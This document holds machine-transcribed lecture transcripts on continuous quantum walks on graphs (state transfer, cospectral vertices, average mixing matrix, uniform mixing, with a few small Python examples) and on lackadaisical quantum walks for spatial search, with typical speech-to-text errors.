the vertex a. And this is how periodicity and PST are related. So the point is this.
So the transition matrix is swapping ket A and ket B, and if I don't want the phase factors, I can suck them into the transition matrix, and so I then have a matrix, an entry matrix, gamma inverse U of t, that's swapping ket A and ket B. So this is a consequence of the definition of per-state transfer. It's a property of the two vertices. Now, what does this tell me graphically now? In graph theory, we have this... Well, you can ask questions about the spectrum of the adjacency matrix, but here I've got a fixed graph, and I've got two vertices, A and B. I'm going to say those two vertices are cospectral. Well, usually I would say that if the graph I get from X is from X, white leading A, as the same carriage polynomial is a graph I get from X, white leading B. So the graphs X drop A and X drop B are cospectral. They have this adjacency matrix that's similar. Now, that's... But the... Because of the previous slide, I know that if I have to take state transfer, then U of t... Well, U of t is a polynomial in the adjacency matrix, so it commits with A. And it sends A to B, and it's... Well, U of t has to have a gamma inverse U of t, and so it does both those things. And gamma inverse U of t squared is the identity. And so this could be taken as a definition of cospectrality. So the one way of thinking of it, which if I'm talking about graphs and similar vertices, I'd be thinking in terms of automorphisms, which would be permutation matrices. And so you might look for an automorphism which maps vertex A to vertex B. That would be a permutation matrix which sends A to B. So a graph theorist is implementation matrices. But for a physicist, you're thinking in terms of Hamiltonians, and you're thinking of symmetries of Hamiltonian, and you only require those to be unitary or orthogonal. Okay? And so in a sense, this Q of t is actually giving you the symmetry, but this corresponds exactly to this graph theory notion of cospectral. And so the conclusion then is that, well, this is a good idea, you know, to protect myself here. So it's easy enough to construct cospectral vertices. You take two copies of graph and join the same vertex in each copy. And then the vertices you join are cospectral. So whenever there's a symmetry in the graph swapping two vertices, those two vertices go spectral. One of the things this example here shows is you can get cospectral vertices where there's no symmetry in sight. There's no graph theory symmetry. Now, in terms of, if I go back to the more general definition I was giving in terms of the Qs, there is an orthogonal matrix which swaps Q and QV, and that'll be other nice things. So, you know, cospectrality is a little strange. The other point is it's, well, reasonably straightforward for graph theory. If you know the vertices of cospectral, they will have the same valency and a bunch of other properties. Okay? So cospectral vertices occur, and they're not always occurring in places that you expect to see it. And so the point then is if I have a vertex state transfer, then the vertices involve the cospectral in the sense I just described. Now, it turns out that's not the full story because in that example I just gave you with that tree there, those two vertices are cospectral, but they won't have vertex state transfer. But the other point is that having PST gives you something a bit stronger than in cospectral. And so I've written up another definition. Actually, I haven't got to it yet. Let's go back a second. Yeah, okay, I see what the problem is. 
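Before the stronger notion comes up, here is a small numerical version (my illustration, with my own choice of example graph) of the cospectrality test just described: vertices a and b of X are cospectral when the vertex-deleted subgraphs X\a and X\b have the same characteristic polynomial, equivalently the same spectrum.

```python
import numpy as np

def spectrum(A):
    return np.sort(np.linalg.eigvalsh(A))

def cospectral(A, a, b):
    keep = lambda v: [i for i in range(len(A)) if i != v]
    sa = spectrum(A[np.ix_(keep(a), keep(a))])
    sb = spectrum(A[np.ix_(keep(b), keep(b))])
    return np.allclose(sa, sb)

# Demo: the path P6, which you can view as two copies of P3 with a
# corresponding end vertex in each copy joined by an edge (the construction
# mentioned in the talk).  Here the cospectrality of the two joined vertices
# is explained by an obvious symmetry; the tree example in the talk has none.
edges = [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5)]
A = np.zeros((6, 6))
for i, j in edges:
    A[i, j] = A[j, i] = 1.0

print(cospectral(A, 2, 3))   # True: the two joined vertices
print(cospectral(A, 0, 2))   # False: an end vertex versus a joined vertex
```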
What I want to do is define strongly cospectral like in the title of the slide there. Okay, so this is a strengthening notion of cospectral. And so I've left out strongly in the first line of the definition there. So, D strongly cospectral. The first three conditions are the same as I had on the definition of cospectral, but now I've added a fourth condition. I want Q to be a polynomial adjacency matrix. Now, that's something I get when it's like state transfer because as I said, U of T is a polynomial adjacency matrix. So, as interesting as we worked with cospectral vertices, I showed you that tree that Schwenke used back in 1973. That was long before people were thinking about quantum computing. So, we were thinking about cospectral vertices. What happens in the quantum walks? There's something stronger relation. We get this strongly cospectral. So, there's a sharpening, which is not something I would have come across graphically. But by thinking about these walks, I get this new relation. And the upshot is that vertices that are related by perfect state transfer must be strongly cospectral. Now, to answer the obvious question before you ask it, that's not enough. It doesn't force PST. I've threatened before that in this area of mathematics, you need linear algebra and number theory. And being strongly cospectral is truly a linear algebra condition. So, it's not enough. In terms of examples, it is true that if you have a graph and the eigenvalues are all simple and two vertices are cospectral, then it's strongly cospectral. So, that tree I drew with the two vertices you and me, they would be strongly cospectral. You'll see another example in a moment. So, here's a construction I referred to before. I take two copies of the same graph and then join in corresponding vertices in each. So, I've used a and b here to avoid some confusion, but I got picked the same vertex in copy of x and joined them by an edge. That's a graph. And you can show that if those two vertices a and b, they will be strongly cospectral. This is a simple way of getting strongly cospectral vertices. And so, now you have the interesting question. Is there a connector graph where x has more than one vertex of that form and you do get perfect state transfer between those vertices? Now, as I said, the problem becomes enough when you come to work it out, involves the number theory. I have to make x have at least one vertex because otherwise I might just get k2, which does have perfect state transfer. But the question is, can I use any bigger graph? Now, it's a fairly simple situation. And you can sit there and do computations and stuff, but I don't have any real idea and any nice, really nice examples. So, that. So, I want to lead up to a... If perfect state transfer is rare, you might start thinking about, well, maybe there's some relaxations which are still useful and I'm leading up to that. But I'm also giving you a somewhat different viewpoint, which I find very useful. So, I'm going to work with density matrices and I'm going to have my quantum walk U of t given by some graph. And now I'm going to look at the... all the matrices U of t for t and r. Now, that set of matrices is a group. It is a subgroup of the entry group. Okay? And so, when you look now, look at the set, U t, d sub a, U of minus t, that's all the density matrices you can get by applying in your quantum walk. So, that's the total image of the quantum... everything that can appear on the quantum walk. Now, that's an orbit. 
So, you've got a Lie group acting on something, so you're in a very controlled situation. And now, if you think in these terms, for each density matrix D_a I've got an orbit, and I get PST from a to b if the orbit of D_a contains D_b. So it's a geometric point of view, and it's a very simple condition: you ask, is this point in that orbit? If it is, you've got perfect state transfer; if not, you don't. That's simple enough: perfect state transfer means D_a and D_b are in the same orbit. Now, the generalization can be set up in more than one way; the one I want is what I call pretty good state transfer. I say we have pretty good state transfer if D_b lies in the closure of the orbit. The picture here is that, in fairly simple cases, you can think of the orbit as sitting on a torus, and you'll have seen pictures of curves on the torus that wind around densely; an orbit can look like that. If you're familiar with Lie groups, this is all trivial. So the statement is that if D_b is in the closure of your orbit, then you're getting what we call pretty good state transfer. Now, you can express this in simpler terms, and it simply says that you pick your epsilon positive, and there's a time t such that U(t) D_a U(-t) is within epsilon of D_b. So you're getting approximate, or pretty good, state transfer: I can't get perfect, but I can do pretty good. Okay? Now, it's a natural enough generalization, and it's occurred to a number of people; I won't go into that. I just want to give you one result, which gives you some idea of the complexity, and you'll see some of the number theory coming in. A group of us proved a result about pretty good state transfer between the end vertices of a path. Now, for perfect state transfer, you get PST between the end vertices of the path on two vertices and the path on three vertices, and no more; that's not spectacularly difficult to prove, but it's not trivial, it's a little involved. The pretty good state transfer situation is a lot more complicated. I have a path on n vertices, and I'm asking for PGST between its end vertices. Then it occurs if and only if one of three conditions holds: the number of vertices plus one is a power of two; the number of vertices plus one is a prime; or the number of vertices plus one is twice a prime. Now, this is purely a number-theoretic condition. And physically it's quite weird, because it's a little bit hard to imagine a system whose behaviour is going to depend on whether you're dealing with a prime or not. But this is what happens. Now, these results have been extended, but the issue is, okay, it does occur; the problem physically is that you may have to wait a long while for it to happen, but I won't go into that now. What I'm saying is you do get PGST, but it depends on number theory. And so now I can ask another question: for which of these graphs (two copies of a graph X with corresponding vertices joined by an edge) do I get pretty good state transfer between those two base vertices? I didn't draw the picture, but if you take the star, one vertex with m neighbours, and use that for X, then if 4m + 1 is a perfect square you do not get PGST between them, and if it is not a perfect square you do. So again it's number theory, but it's interesting: the previous conditions were about primes, and this one turns on whether something is a square or not. So it's a different flavour of number theory, but it's still number theory.
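Since these conditions are purely arithmetic, they are easy to play with. The helper below (my illustration, not from the talk) just encodes the stated criterion for pretty good state transfer between the end vertices of the path on n vertices: n plus one should be a prime, twice a prime, or a power of two.

```python
def is_prime(m):
    if m < 2:
        return False
    d = 2
    while d * d <= m:
        if m % d == 0:
            return False
        d += 1
    return True

def is_power_of_two(m):
    return m >= 1 and (m & (m - 1)) == 0

def path_has_end_vertex_pgst(n):
    """Stated criterion: P_n has PGST between its end vertices
    iff n + 1 is a prime, twice a prime, or a power of two."""
    m = n + 1
    return is_prime(m) or (m % 2 == 0 and is_prime(m // 2)) or is_power_of_two(m)

print([n for n in range(2, 20) if path_has_end_vertex_pgst(n)])
# -> [2, 3, 4, 5, 6, 7, 9, 10, 12, 13, 15, 16, 17, 18]
```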
So, mathematically, this is quite surprising. The other point is... Well, I mentioned Gabriel's name before, and he's in the computer science department, so he asked the question, is it possible to determine in polynomial time whether a graph admits pretty good state transfer? Now, we can. I showed that you can give us a graph. Then in polynomial time, you can decide if there's Pst between two vertices or not. We don't know whether you can get... How hard is to determine PgST? I think Gabriel has a hope that you can do it in polynomial time, but I'm more skeptical. So, the issue is with the Pst, there is an option to tell us if it's going to occur, it must occur within a sticked up and down on the time, and so in a certain sense, that narrows things down. But for the PgST, we have no idea at this point. Okay. So, excuse me. The next topic is what I'm going to call averaging. Now, the one way of motivating this for me is that if I construct some natural parameter or natural matrix depending on the quantum walk, then I've got a graph invariance. I've got a new way of... a new property of a graph, and I'm going to define the distance of that relation between properties of the graph and properties of this invariant. Okay. So, the invariant I'm going to introduce now is what I call the average mixing matrix. So, remember that the mixing matrix entries are just the squares of the absolute values of the entries of the transition matrix. Okay. So, it's a non-negative matrix with rows and columns, something to one, and I'm going to define the average mixing matrix the way I've just done it up there. And, or you can dig out more from the references from that. Now, the two comments. The first thing is that averages like this appear, well, in a gothic theory, in particular in work of von Neumann, and there's always mice to be able to cite von Neumann when you're trying to talk to visitors. But so, not exactly this one, but something very similar. Now, of course, the other question is, any fuel can write down a limit like this, but does it exist? Now, so, we can take care of that because we can compute it another way and it gives us more information. So, I've got my adjacency matrix, A, it's been there all along, and now it's got a spectral decomposition. Okay. And so, the eigenvalues are theta r, and the eigenpotence, the projections, and the eigenspaces are e sub r. So, the U of t has a spectral decomposition. It's got the same eigenpotence, and the eigenvalues are e to the i t theta r now. Okay, so we can write out, we've got the spectral decomposition for U of t. And so, now I can write out a formula for m of t. And so, I get something which looks like a spectral decomposition, although it's not, but it's still a linear combination. I've got things like, I've got e to the i t theta r, minus theta s, this is my scalar, that's my linear combination, and it's an linear combination. Matrix, these matrices are the sure products of E r with E s. So, this is the bad student's product of two matrices. You multiply the identity to the identity. So, that's all I'm doing there. So, I mean, I'm just using linearity. I get to this. Now, this is a sure product of two positive semi-definite matrices. And so, for example, there's a theorem of sure that says that positive matrix is always positive semi-definite. Not that it really matters. Now, the point is I don't really care at the moment about m of t. I was interested in this average. 
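Written out, the formulas just described look like this (my reconstruction of the slide, using the Schur product notation from earlier):

```latex
% With the spectral decomposition A = \sum_r \theta_r E_r,
\[
  U(t) \;=\; \sum_r e^{i\theta_r t} E_r ,
  \qquad
  M(t) \;=\; U(t)\circ\overline{U(t)}
        \;=\; \sum_{r,s} e^{i(\theta_r-\theta_s)t}\, E_r\circ E_s .
\]
% The time average of e^{i(\theta_r-\theta_s)t} vanishes unless
% \theta_r = \theta_s, so only the r = s terms survive the averaging
% described next:
\[
  \widehat{M} \;=\; \lim_{T\to\infty}\frac{1}{T}\int_0^T M(t)\,dt
            \;=\; \sum_r E_r\circ E_r .
\]
```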
When you do the averaging, a simple calculation shows that the off-diagonal terms all go away, and so the average mixing matrix is just the sum of the Schur squares of the idempotents. Which is a perfectly reasonable concept, but nobody had thought about looking at it before; we came to it by looking at questions about quantum walks. Now, let's do a very simple example. If you take the complete graph on n vertices, then its adjacency matrix (we graph theorists use J for the all-ones matrix, square in this case) is just J minus the identity. And you can see very quickly that the idempotents in the spectral decomposition of the adjacency matrix of the complete graph are 1/n times the all-ones matrix, and the identity minus 1/n times the all-ones matrix, because there are only two eigenvalues and the idempotents have to sum to the identity; so once you've worked out the first idempotent, you've got the second. And so, with a little bit of work, you get the expression for the average mixing matrix of the complete graph: it's (1 - 2/n) times the identity plus (2/n^2) times J, which has a somewhat surprising consequence. For a large complete graph, that average mixing matrix is pretty much the identity. Now, that's a little weird already, but it leads to something even stranger, which I'll come to in a moment. The average mixing matrix does have a number of special properties. The Schur square of a positive semidefinite matrix is positive semidefinite, and M-hat is a sum of such Schur squares, so it's positive semidefinite; that's straightforward. (I guess you would just call it positive rather than positive semidefinite.) The entries of that matrix are rational, which is not obvious. And the other point to make is that two rows of the average mixing matrix are equal if and only if the corresponding vertices are strongly cospectral. So all these things are tied together, and it's a useful matrix. You can show that if the rank of that matrix is one, then the graph must have at most two vertices, and a bunch of us have spent a lot of effort looking at the rank-two case; the question is whether there are infinitely many graphs whose average mixing matrix has rank two. I don't have a clue, I guess is the short answer. It's a fairly strong restriction, I would have thought, but we have a number of examples, just enough to make it complicated. But I want to go back. Another property of the average mixing matrix: I said that the fact that the average mixing matrix of the complete graph was close to the identity was weird, and I want to drive this home. It's not too hard to prove from the definition (and now I'm using the curly greater-than-or-equal-to to denote that the difference of the two sides is positive semidefinite) that I minus the mixing matrix is positive semidefinite, and that M(t) minus (twice M-hat minus I) is positive semidefinite. And for the complete graph, this yields that M(t) minus the matrix up there is positive semidefinite. Now, if A is curly-greater-than-or-equal-to B, then the diagonal entries of A must be greater than or equal to the diagonal entries of B; that's a fact about positive semidefinite matrices. So this statement tells us that the diagonal entries of M(t) are bounded below by the diagonal entries of twice M-hat minus I, which for the complete graph works out to (1 - 2/n) squared.
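Here is a numerical check (my illustration, not from the talk) of the complete-graph computation above: the average mixing matrix built as the sum of Schur squares of the spectral idempotents, compared against the closed form (1 - 2/n)I + (2/n^2)J, together with the lower bound (1 - 2/n)^2 on the diagonal entries of M(t).

```python
import numpy as np
from scipy.linalg import expm

def average_mixing_matrix(A, tol=1e-9):
    vals, vecs = np.linalg.eigh(A)
    Mhat = np.zeros_like(A, dtype=float)
    used = np.zeros(len(vals), dtype=bool)
    for r in range(len(vals)):
        if used[r]:
            continue
        idx = np.where(np.abs(vals - vals[r]) < tol)[0]  # one eigenspace
        used[idx] = True
        E = vecs[:, idx] @ vecs[:, idx].T                # spectral idempotent E_r
        Mhat += E * E                                    # Schur square of E_r
    return Mhat

n = 7
A = np.ones((n, n)) - np.eye(n)                          # adjacency matrix of K_n
Mhat = average_mixing_matrix(A)
closed_form = (1 - 2 / n) * np.eye(n) + (2 / n**2) * np.ones((n, n))
print(np.allclose(Mhat, closed_form))                    # True

# Diagonal entries of M(t) should never drop below (1 - 2/n)^2.
for t in np.linspace(0.1, 10, 50):
    M = np.abs(expm(1j * t * A)) ** 2
    assert M.diagonal().min() >= (1 - 2 / n) ** 2 - 1e-9
print("diagonal bound holds at the sampled times")
```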
So, I said that M-hat was close to the identity, but now I'm saying something a lot stronger: M(t) is close to the identity. And this is kind of bizarre. You're doing a quantum walk on the complete graph, you measure it at some time t, and with very high probability you're on the vertex you started at. So I'll say a family of graphs is sedentary if there's a constant c for which a bound of that form holds. And given that definition, as I've just sketched, the complete graphs are sedentary. Now, I have other examples. The issue is that I need my graphs to have a relatively high valency, and so a concrete question is whether there's a sedentary family of connected cubic graphs, graphs where every vertex has valency three. I've got some work on this, and I can give you examples other than complete graphs, so there are examples of sedentary families. But one feature, as I said, is that generally for those families the valency increases with the number of vertices. So the question is whether you can do this in the constant-valency case. Okay, good. So my final group of questions is related to something I mentioned way back on one of the first slides: uniform mixing. Uniform mixing occurs if there's a time t such that all entries of U(t) have the same absolute value. Now, instead of asking for that, you might also ask whether there are situations where, if I start at a certain vertex and measure at time t, all outcomes are equally likely. That would say that a certain row of the mixing matrix has all entries equal, and they would be 1/n. That would be local uniform mixing. So we've got these two variants, uniform mixing and local uniform mixing, and if you have local uniform mixing at every vertex at the same time, you have uniform mixing. Right. Now, there's a long slide here giving you a summary of what we know about it. I showed you earlier that the complete graph on two vertices admits uniform mixing at time pi/4, and the hypercubes also admit uniform mixing at time pi/4. And as I mentioned before, there are many cases where, if we have PST at time t, then we have uniform mixing at time t/2, and we don't really have an explanation for why this happens. The complete bipartite graph K_{1,3}, one vertex joined to three others and no other edges, admits uniform mixing, and its Cartesian powers do too; this is an observation due to Harmony Zhan. And this is the only family of graphs which are not regular where I know that we have uniform mixing. We do get local uniform mixing in other cases; at the bottom there, for K_{1,n}. If you're going to get uniform mixing, you expect, in the simplest situation, that the vertices of the graph all look alike. The easy way to arrange that for graphs is to assume that for any two vertices there is an automorphism taking one vertex to the other; this would be a so-called vertex-transitive graph. Now, looking at examples of vertex-transitive graphs, the simplest not entirely trivial examples would be the cycles. And the only even cycle that admits uniform mixing is C4, and the only cycle of prime length that admits uniform mixing is the complete graph on three vertices, the triangle.
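The hypercube claim is easy to verify numerically. This small check (mine, not the speaker's) confirms that at time pi/4 every entry of U(t) for the d-cube has absolute value 2^(-d/2), which is uniform mixing.

```python
import numpy as np
from scipy.linalg import expm
from functools import reduce

def hypercube_adjacency(d):
    """Adjacency matrix of the d-cube as a Kronecker sum of d copies of K2."""
    X = np.array([[0.0, 1.0], [1.0, 0.0]])
    I = np.eye(2)
    A = np.zeros((2**d, 2**d))
    for k in range(d):
        factors = [X if j == k else I for j in range(d)]
        A += reduce(np.kron, factors)
    return A

d = 3
U = expm(1j * (np.pi / 4) * hypercube_adjacency(d))
print(np.allclose(np.abs(U), 2 ** (-d / 2)))   # True: uniform mixing at pi/4
```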
It's somewhat annoying: it's unlikely that any of the longer odd cycles admit uniform mixing, but we don't have anything like a proof at this point. And so that's the first question: which odd cycles admit uniform mixing? Now, Gabriel and Krystal looked at C9 and ruled that out, so probably the first open case is C15. Now, another question would be: is there a graph other than K_{1,3} that is not regular and admits uniform mixing? And a related question would be: which trees admit local uniform mixing? Now, to finish off, I want to state a couple of conjectures due to Natalie Mullin. If I'm looking for uniform mixing, it's natural to focus on graphs that are vertex transitive, and so what I'm doing here is giving you a standard way of constructing vertex-transitive graphs, namely what are called Cayley graphs. And it's really, really simple. I start with some group, a finite group normally, and I pick a subset of its elements, which I'm calling script C. The vertices of my graph are going to be just the elements of the group. And when I define a graph, I've got to tell you what the vertices are, and then I've got to give you the adjacency rule, the way of telling whether two vertices are adjacent. And the rule is that g will be adjacent to h if h times g-inverse is in my set script C. Now, because I want to get a graph and not something slightly weird, I want to assume that my set script C doesn't contain the identity, and that if it contains an element c, it also contains its inverse. So anyway, you choose it carefully, you get a graph, and these graphs are always vertex transitive. There are vertex-transitive graphs you can't get in this way, but that's not going to matter. And the simplest example, really, is to take the cyclic group of order n and just take the elements one and minus one; then the graph you construct is just the n-cycle, not that we needed another description of the n-cycle. And so my student Natalie Mullin made two conjectures. And again, you see, the first one's number theory: if the graph admits uniform mixing at time t, then e to the it is a root of unity. And the other thing she conjectures is that if n is greater than 5, then no connected Cayley graph for Z_n to the d admits uniform mixing. We do have uniform mixing on Cayley graphs for Z_2 to the d and Z_3 to the d, and probably Z_4 to the d; I don't think we ever really got to that, but it's likely for Z_4 to the d. And the first question sort of helps you: if we knew it was true, then it would be a lot easier to decide the second question. That's probably the way of doing it. And thanks for your attention. That's the end of the talk. Thank you. So, questions. Oh, hi. You talked about uniform mixing and perfect state transfer. Recently we wrote a paper about something quite opposite: we looked at zero transfer, which means that during the quantum walk some nodes would be completely hidden. The techniques you applied here, do you think they would apply to zero transfer? Tino Tamon has done some work on this, and we've thought about it a little bit; we actually do have some results. It's not my terminology: Tino has a name for a vertex such that there's a time at which that entry of the matrix is zero. And so we have a few results, examples saying that in these cases there are such times.
But it's fairly easy to write down examples where you do the plot and you convince that this will be zero at these intervals, and we don't have a proof. So for example, one example, to use this off, you look at the cycle on five vertices, you're going to do transfer on that. Okay, so you work at U of t and you plot it. Now I want to look at the one, two entry of the cycle. Now it's a complex number, but I can plot it in the plane. And so I get a nice plot. It looks like a five leaf clover. And you let it fill out. Starts at zero. And I shouldn't have done it. We don't know whether it's ever zero again. So these questions are difficult. Thank you. Yeah. It's a pretty good. Yeah, stay transfer. So. Do you have some examples of the graph? The time can be estimated. There exists a. Essentially what's driving it is what creates recurrence there. Okay, which means now, I mean, I know people in statistical physics, you know, cite this and quote it. I'm not sure what the at the average of the average working physics to point out the way serum is because the waiting time is very large. So for the path on three vertices, you're getting perfect state transfer. You know, small model of pie. I'm going to get the right number now for the path on four vertices. You do get pdst between the end vertices. But yet to get to be with one percent accuracy, you have to wait to be like 800 pie. So and the basically the waiting time. So the waiting time is going to be you're going to pick a net slum ball around your target. Now it's an epsilon ball on a high dimensional torus. And so the waiting time is one over e to the dimension. And this dimension is ten binomial theory for the path on four vertices. It's just two as you go up, it increases the sort of half the length of the path. So it's your waiting time is getting very bad very quickly. So that's the bad news. Now there's an interesting paper by Fitter, which we're being trying to understand. Fitter and a few others which we're trying to understand. We're seeing some say that if you can modify the graph a bit and speed things up. But he's writing as a physicist and we're not quite, we don't quite follow the mathematics. And so it's, I'm not going to make a precise statement. And that's a question. Did you consider pretty good uniform mixing? Yeah, we have. It's in Natalie Mullen's thesis. So it's kind of, yes, so you can't get uniform mixing on the five cycle, but you can get uniform mixing to with any degree of precision, which is kind of interesting. Because sometimes people think if they can do something to pretty good, after precision, I should be able to do it exactly. But for the five cycle, you do not get uniform mixing. Tino and his students proved that, but you can get pretty good approximation. Yeah. Do you have more questions? I have a question. It's a related to the, it's a question. Is this some of the, is it you can, yeah, you are roughly considered that pretty good uniform mixing. Is that you, you say that's a little bit considered. Is there some of the relationship in the Kraschka case, Kraschka uniform, pretty good type uniform mixing on the graph in the X-panda graph, I think. Sorry, I'm going to, no. And that's some of the X-panda graph. And that's some of the uniform mix, pretty good uniform mixing. Well, the problem is in the classical case, you always get mixing. I mean, if you have a classical connect to graph, the long-term state is uniform. That's very likely. So classically, you always get uniform mixing. 
So it doesn't have to be an expander. You just have to be connected. I see. Yeah. Okay. The quantum case, you don't. It's just why the quantum case is interesting. Okay. Yeah. More questions? If not, let's thank Chris again.
|
Continuous quantum walks are of great interest in quantum computing and, over the last decade, my group has been studying this topic intensively. As graph theorists, one of our main goals has been to get a better understanding of the relation between the properties of a walk and the properties of the underlying graph. We have had both successes and failures. The failures lead to a number of interesting open questions, which I will present in my talk.
|
10.5446/54098 (DOI)
|
Thank you for the introduction. Thank you to the organizers for inviting me. So I'll be speaking about some work on spatial search. So it's an algorithmic application of quantum walks. And the type of quantum walk I'm going to be using is something called a lackadaisical quantum walk. So lackadaisical is just a synonym for lazy. So it's a lazy quantum walk. So I'll start by introducing what this is by reviewing what you all have seen many times in an expert's in, which is the 1D line. So talk about a normal random walk and then a normal Hadamard quantum walk. And then what makes a lackadaisical quantum walk different? After that, we're going to look at some search problems. So we're going to start with Grover's problem, which is search on the complete graph. And then we're going to look at search on the 2D grid. And then we're going to look at some recent results with one of my undergraduate students on search on the complete bipartite graph. If you want to ask questions as we go, feel free. I'm used to teaching undergrads. So you can just raise your hand or if I don't see you, just shout out or something. All right. But first, before we get to that, it seems like no one knows where Omaha, Nebraska is. So I thought I'd start with that. So where is the state of Nebraska? You want to see it? I start to see some knots. People are picking it up. Yes, it's right there in the middle, in the Midwest, above Kansas. And Omaha is on the eastern border next to Iowa. So that's where Omaha, Nebraska is. Now you know. So Omaha has a population of about half a million. If you count all the towns around it, it's a population of about one million. What is Omaha known for? Well the biggest thing is Warren Buffett. So Warren Buffett is a legendary businessman and investor. So I think he's the fourth richest man in the world. But he's very generous. So he's the billionaire who started this challenge to other billionaires to donate most of their money when they pass away. Yes, so his company is Berkshire Hathaway, which I think is the fourth largest company in the world. And every year they have their shareholders meeting in Omaha. And so tens of thousands of people from all over the world convene onto our mid-sized city for this shareholders meeting. We're also famous for the College World Series, which most of you wouldn't know. Does anyone know what sport this is? How about that? Baseball. Baseball. So yeah, it's American. So the college baseball championship takes place in Omaha every year. And then finally, we actually have a very good zoo. So the San Diego Zoo and the Omaha Zoo actually go back and forth as the number one zoo in America, which you wouldn't expect in Omaha. All right. So let's get into the research. So if you have a quantum walk on the line, as you know, what you do is if your walker starts in the middle, what he does is he flips a coin. And if it's heads, then he faces left. And then if it's tails, he faces right. And then after that, he takes a step. And again, you flip a coin. You face left or you face right. And you take another step. And if you repeat this process, as you know, many times, you get this shape. So this is a binomial distribution. And the spread of this is quite slow. It scales as the square root of the number of steps. OK. So you guys know this. And just to be clear, this is using the Hadamard coin and the moving shift. So if we look at a, sorry, that was Costco, now for the quantum. So you see the quantum. So it's the same idea. 
So what we'll do is when you flip the coin, we'll flip a quantum coin. And so now the result can be a superposition of heads and tails. So you point left and right. And then when you take your quantum step, you step in a superposition. So now you're in multiple locations at once. And you repeat that so that you're in a superposition of heads and tails and a superposition of positions. And so if we do that a bunch of times, well, here's the classical result we just had. And now the quantum result, as you know, is this two-peak behavior. And the spread of this is much faster. So instead of being stuck around here, you're more likely to be far away at the peaks. And the standard deviation of this scales linearly in time. So it's a quadratically faster spread. And this is some intuition as to why quantum algorithms based on quantum walks might be faster, because it can spread more quickly. This is the part that has a Hadamard coin in the moving shift. So the moving shift means if you're pointing left, or this is your right, if pointing right, you take a step, you just continue pointing right. So that's it. You just move left or right. All right. So let's talk about lazy random walks. So classically, first, lazy random walks are actually really useful algorithmically. So nothing quantum here. And just to give you some intuition for why. Just consider a bipartite graph like this. So a bipartite graph has two vertex sets. So there they are circled. So you see, in each set, they're not connected to each other. They only connect to vertices in the other set. And let's say we do a classical random walk where we start with some probability distribution over the left set. So if we take a step of the walk, where do we end up? We end up in the right set. We take another step of the random walk. Where do we end up? We take another step on the left set. And we see just even with a classical random walk, you only are in one set or the other. You're not over both. And so if you want to be in a probability distribution over both sets, what you can do is you can use a lazy random walk. So you have some probability of jumping and some probability of staying put. And if you do that, then you'll get some probability distribution over both sets. And you might imagine some situations where this might be useful so that you don't just get trapped in one set or the other. And so classically, there's a bunch of applications of this that I'm not an expert in, but there's some citations if you want to look things out. And so a while back, I was thinking about whether or not there were some quantum analogs of this. And so Andrew Childs came up with one in 2010, which he called a lazy quantum walk, which is quite complicated. And so when I came up with mine, I needed a different name because lazy quantum walk was already taken. So I just looked up, what are synonyms for lazy? And I picked lackadaisical quantum walk. This is kind of a fun word, even if it's hard to say. So lackadaisical quantum walk. And so the idea here is very simple. All you do is you add a self-loop at every vertex. So on the one-dimensional line, it would look like this. So you have three directions now. So if you're at the origin, you can point left, or you can point right, or you can point to yourself so that you stay put. And so then if you walk, you can walk left, you can walk right, or you can walk in place and not move at all. And these are weighted edges. So that way you can adjust how lazy the walker is. 
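As a purely classical aside (my illustration, not from the talk), here is a tiny simulation of the bipartite point made a moment ago: an ordinary random walk started on one side of a bipartite graph bounces between the two sides forever, while a lazy walk with some probability of staying put spreads over both sides. The graph K_{3,3} and the laziness value are my choices.

```python
import numpy as np

def lazy_walk_matrix(A, p_stay):
    deg = A.sum(axis=1)
    P = A / deg[:, None]                      # ordinary random-walk matrix
    return p_stay * np.eye(len(A)) + (1 - p_stay) * P

# Complete bipartite graph K_{3,3}: vertices 0-2 on the left, 3-5 on the right.
A = np.zeros((6, 6))
A[:3, 3:] = 1.0
A[3:, :3] = 1.0

p0 = np.zeros(6)
p0[0] = 1.0                                   # start on the left side

for p_stay in [0.0, 0.3]:
    P = lazy_walk_matrix(A, p_stay)
    p = p0.copy()
    for _ in range(25):
        p = p @ P
    print(f"p_stay = {p_stay}:",
          "left mass =", round(p[:3].sum(), 3),
          "right mass =", round(p[3:].sum(), 3))
# With p_stay = 0 all probability sits on a single side after each step;
# with p_stay > 0 the distribution settles over both sides.
```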
So if L is bigger, then it's going to be more lazy. You're going to preferentially stay put. And if it's smaller, you're less lazy. All right, so one of the things with this is if we have three directions now, we can't use the Hadamard coin, because that's only for two directions. And the coin that we use in search algorithms is called the Grover coin. And so let me start by reviewing the Grover coin on an unweighted graph. And so let's look at this left, right, and pointing to yourself with no weight. So there's no weight L here. So everything has weight 1, if you will. So with this normal Grover coin, let's see how it acts on the amplitude. So let's say you're here and you're pointing left with amplitude A, you're pointing B with amplitude, sorry, you're pointing right with amplitude B, and you're pointing to yourself with amplitude C. So what we're going to do is we're going to let mu be the average of these amplitudes. So it's literally A plus B plus C divided by 3. So it's just the average of these amplitudes. What the Grover coin does is it transforms this state into the following. So where there was an amplitude A of pointing to the left before, it now becomes 2 times the average minus A. And then where there was B before, it becomes 2 times the average minus B. And where there is amplitude C becomes 2 times the average minus C. And so this transformation actually is an inversion about this average mu. And so if you learn Grover's algorithm from an introductory course in quantum computing, one of the operations is an inversion about the mean. This is exactly that. So this Grover coin implements an inversion about the mean. And so if you try to search algorithms, it ends up having that Grover characteristic. Any questions so far before we get to the lackadaisical version? OK, so for the lackadaisical version, we need to see what happens on a weighted graph. So now we have this self-loop with weight L. And the left and right are unweighted. So they're weight 1. So let's say the amplitudes again are A, B, and C. And let's see what happens. So instead of the average of the amplitudes, I'm going to define this quantity mu bar, which is A plus B. And for C, since it has weight L, it gets multiplied by the square root of L divided by the sum of the weight. So this is weight 1, weight 1, weight L. So this is 1 plus 1 plus L. So this is not the average of the amplitudes anymore. And what this generalized Grover coin does on a weighted graph is amplitude A becomes 2 times this not average minus A. B becomes 2 times this not average minus B. And C becomes something a little different. It's 2 times this average, not not average, times the square root of L minus C. OK, so what happens is A and B get inverted about this non-average, this whatever it is, mu bar. So unweighted edges are inverted about this quantity. And then C is inverted about this thing times the square root of L. So that acts a little differently. And you can generalize this to whatever weighted graphs you want. So this is actually just a quantum walk on a weighted graph now. Looking for a picture, OK? So let's see what happens. So the reason why the Grover coin is defined like that is because if you use that generalized Grover coin and you use the flip-flop shift, what you get is a walk that is exactly the same as Zegadie's quantum Markov chain. Because with a quantum Markov chain, you have different probabilities of moving one way or another. So it's essentially a weighted graph. 
